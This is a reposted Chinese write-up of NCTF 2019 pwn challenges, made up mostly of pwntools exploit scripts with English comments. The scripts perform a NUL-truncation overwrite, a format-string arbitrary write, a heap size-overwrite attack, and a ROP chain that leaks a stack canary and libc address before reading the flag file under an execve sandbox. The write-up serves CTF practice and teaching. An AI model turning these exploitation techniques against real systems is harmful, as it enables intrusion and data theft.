Nctf2019 pwn

没啥好说的自己菜
就做了三个

hello_pwn

没啥好说了直接连

from pwn import *
# Assigned but never read: this script has no local/remote switch and always
# connects to the remote service.
local=1
# Connect to the challenge service at the address given in the writeup and hand
# the socket straight to the user; nothing is sent by the script itself.
p=remote('139.129.76.65',50003)
p.interactive()

pwn me 100 years! (Ⅰ)

00截断然后直接覆盖

from pwn import *
p=remote('139.129.76.65',50004)
#p=process('./pwn_me_1')
# 'yes' padded with NUL bytes up to 0x10 bytes. Per the writeup the target's
# string check stops at the first NUL, while the 'ffff' appended past offset
# 0x10 ends up in the data that follows the input buffer.
# Python 2 str semantics are assumed here (no b'' prefixes anywhere in the file).
payload='yes'.ljust(0x10,'\x00')
payload+='ffff'
p.sendline(payload)
p.interactive()

pwn me 100 years! (Ⅱ)

学习到了大师傅们的写入原来是不管\x00截断的，我们需要注意的只有偏移和格式化字符串的位置，然后之后还是可以分位置写入的。

from pwn import *
# Local process only; this script has no remote branch.
p=process('./pwn_me_2')
elf=ELF('./pwn_me_2')
# Stack-argument index at which the input buffer starts. Not read below, but it
# is consistent with the %10$/%11$ positions used later: 6 + 0x20/8 = 10 and 11.
offset=6
p.recvuntil('name:')
# First input: 24 '%p' conversions so the service echoes stack values back.
p.send('%p'*24)
# The reply is expected to contain a pointer ending in 'd30'; the last 14
# characters up to that point are parsed as hex and 0xd30 subtracted to obtain
# the binary's load base. This depends on this exact build of the binary.
base=int(p.recvuntil('d30')[-14:],16)-0xd30
# Offset of the target variable inside the binary, taken from the writeup.
flag_addr=base+0x2020E0
log.success('base: '+hex(base))
log.success('flag_addr: '+hex(flag_addr))
p.recvuntil('want?')
# Second input: '%<0x6666>d' raises the written-byte count to 0x6666, then each
# %hn stores the low 16 bits of that count through the pointer at stack
# positions 10 and 11 (flag_addr and flag_addr+2).
payload='%'+str(0x6666)+'d%10$hn%11$hn'
# Pad to 0x20 bytes so the two pointers below land at positions 10 and 11.
# The writeup notes the write is not cut off at the NUL padding.
payload=payload.ljust(0x20,'\x00')
payload+=p64(flag_addr)+p64(flag_addr+2)
p.send(payload)
p.interactive()
# Python 2 print statement. It only executes after the interactive session is
# closed, so it is of no use for inspecting the payload before it is sent.
print payload

pwn me 100 years! (Ⅲ)

很简单的堆题。程序先申请了一个堆块，只要数字等于0x66666666就会给你shell。edit函数有溢出，直接覆写size位然后free，add将下一个chunk的fd写成首块chunk，add 2次写入即可。

from pwn import *
# Target selection: 1 = local process, anything else = remote service.
local=1
if local==1:
	p=process('./pwn_me_3')
	elf=ELF('./pwn_me_3')
else:
	# Placeholder host/port: the remote branch was never filled in for this task.
	p=remote('1',1)
	elf=ELF('./pwn_me_3')

def add(size,content):
	"""Menu option 1: allocate a chunk of `size` bytes filled with `content`.

	Waits for the menu prompt ('5,exit'), then answers the 'size:' and
	'content:' prompts. `content` is sent raw, without a trailing newline.
	Uses the module-level connection `p`.
	"""
	p.recvuntil('5,exit')
	p.sendline('1')
	p.sendlineafter('size:',str(size))
	p.sendafter('content:',content)

def delete(idx):
	"""Menu option 2: free the chunk at index `idx`.

	Waits for the menu prompt ('5,exit') and answers the 'idx:' prompt.
	Uses the module-level connection `p`.
	"""
	p.recvuntil('5,exit')
	p.sendline('2')
	p.sendlineafter('idx:',str(idx))

def show(idx):
	"""Menu option 3: print the chunk at index `idx`.

	Only selects the menu entry; the caller is responsible for reading the
	output. Not used by exp() below (only referenced in a commented-out line).
	"""
	p.recvuntil('5,exit')
	p.sendline('3')
	p.sendlineafter('idx:',str(idx))

def edit(idx,content):
	"""Menu option 4: overwrite the chunk at index `idx` with `content`.

	`content` is sent raw after the 'idx:' prompt. The writeup states the
	program's edit handler does not bound the write to the chunk size, which
	is what exp() relies on when it passes more than 0x18 bytes for chunk 0.
	"""
	p.recvuntil('5,exit')
	p.sendline('4')
	p.sendlineafter('idx:',str(idx))
	p.send(content)

def exp():
	"""Drive the heap challenge in the order described in the writeup.

	Four allocations, two frees, an over-long edit of chunk 0 that rewrites
	the size field of chunk 1, a free of chunk 1, then re-allocations so that
	the final allocation receives the value 0x66666666 the program checks for.
	Relies on the module-level connection `p` via add()/delete()/edit().
	"""
	#gdb.attach(p,'b *0x0400B93')
	add(0x18,'aaaa')  #idx 0
	add(0x10,'bbbb') #idx 1
	add(0x10,'cccc') #idx 2
	add(0x10,'dddd') #idx 3
	delete(3)
	delete(2)
	# 0x18 bytes fill chunk 0; the p64(0x41) that follows lands on chunk 1's
	# size field (the writeup: "overwrite the size, then free").
	edit(0,'a'*0x18+p64(0x41))
	delete(1)
	# Re-allocate the enlarged region. The content places a 0x21 size header at
	# offset 24 followed by one zero byte; per the writeup this makes the next
	# chunk's fd refer to the first chunk.
	add(0x30,'\x00'*24+p64(0x21)+p8(0))
	#add(0x30,'aaaa')
	add(0x10,'a')
	# The writeup states the program checks for exactly this value.
	add(0x10,p64(0x66666666))
	#gdb.attach(p,'b *0x0400C2A')
	#show(0)
	p.interactive()

# Script entry point; the connection `p` is already opened at import time above.
if __name__=="__main__":
	exp()

warmup

开了沙箱，过滤了execve，直接读呗…

from pwn import *
# Imported but never used; libc offsets below are hard-coded instead.
from LibcSearcher import *
# 0 = remote service, 1 = local process. Both branches load the same binary but
# a different libc file; every offset in exp() is tied to the 2.23 build.
local=0
if local==1:
	p=process('./warm_up')
	elf=ELF('./warm_up')
	libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
else:
	p=remote('139.129.76.65',50007)
	elf=ELF('./warm_up')
	libc=ELF('./libc-2.23.so')
# Gadget addresses inside the binary (fixed 0x400000-based addresses, i.e. the
# binary is treated as non-PIE), taken from the writeup.
pop_rdi=0x000400bc3
pop_rsi_r15=0x000400bc1
# Writable address in the binary used as scratch space for the file name and,
# later, for the file contents.
flag_addr=0x6010b0
def su(address):
	"""Log `address` as a success line in hex. Defined but not called in this script."""
	log.success('address :'+hex(address))
def exp():
	"""Leak the stack canary and a libc address, then run an open/read/write chain.

	The writeup notes the binary runs under a sandbox that filters execve, so
	instead of spawning a shell the second chain reads the flag file and writes
	it to stdout. All libc offsets are specific to the libc-2.23 build named in
	the setup above. Uses the module-level `p`, `elf`, `libc` and gadget values.
	"""
	p.recvuntil('!!!')
	# Fill the buffer right up to the canary so the echo that follows leaks the
	# bytes after the padding.
	p.sendline(0x18*'a')
	p.recvuntil('aaaaa\n')
	# Only 7 bytes are taken (presumably the canary's lowest byte is 0x00 and
	# terminates the echo); it is left-padded with a zero byte to restore 8.
	canary=u64(p.recv(7).rjust(8,'\x00'))
	log.success('canary: '+hex(canary))
	# First chain: overwrite canary with the leaked value, saved rbp with 0,
	# then puts(puts@got) to leak a libc pointer and return to 0x00400AB6
	# (an address in the binary, from the writeup) for a second input round.
	pd='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x00400AB6)
	p.recvuntil(' ?')
	p.sendline(pd)
	# The leaked pointer is assumed to end in 0x7f; take its last 6 bytes and
	# zero-extend to 8.
	put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	log.success('put_addr: '+hex(put_addr))
	libcbase=put_addr-libc.symbols['puts']
	# Hard-coded libc-2.23 offsets for open/write/read and two gadgets. They are
	# not resolved through the `libc` ELF object, so a different libc build
	# would not fail loudly here.
	open_addr=libcbase+0x0F7049
	log.success('open_addr: '+hex(open_addr))
	write_addr=libcbase+0x00F72B0
	read_addr=libcbase+0x0F7250
	pop_rdx=libcbase+0x00001b92
	pop_rsi=libcbase+0x0202e8
	p.recvuntil('!!!')
	p.sendline('binbin')
	# Second chain, part 1: read(0, flag_addr, rdx). Note that pop_rsi_r15 loads
	# rsi=flag_addr and r15=0x8 - the 0x8 does NOT set the length in rdx, which
	# keeps whatever value the previous call left.
	payload='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(flag_addr)+p64(0x8)+p64(elf.symbols['read'])
	# Part 2: open(flag_addr, 0), then rdi=3 - assumes the new file descriptor
	# is 3, i.e. nothing else was opened.
	payload+=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(open_addr)+p64(pop_rdi)+p64(3)
	# Part 3: read(3, flag_addr, 0x100) into the same scratch buffer, then
	# rdi=1, rsi=flag_addr for the final write.
	payload+=p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x100)+p64(read_addr)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)
	# Part 4: write(1, flag_addr, 0x100).
	payload+=p64(pop_rdx)+p64(0x100)+p64(write_addr)
	p.recvuntil(' ?')
	p.send(payload)
	# Timing-based sync: wait for the chain to reach read() before supplying the
	# file name. 'flag' and '\n' are sent as two separate writes, presumably so
	# the read() returns after 'flag' alone and the newline is left unread.
	sleep(1)
	p.send('flag')
	p.send('\n')
	p.interactive()
# Script entry point; the connection `p` is already opened at import time above.
if __name__=="__main__":
	exp()

后面的easy_rop,easy_heap没看了



转载自blog.csdn.net/qq_37433000/article/details/103229403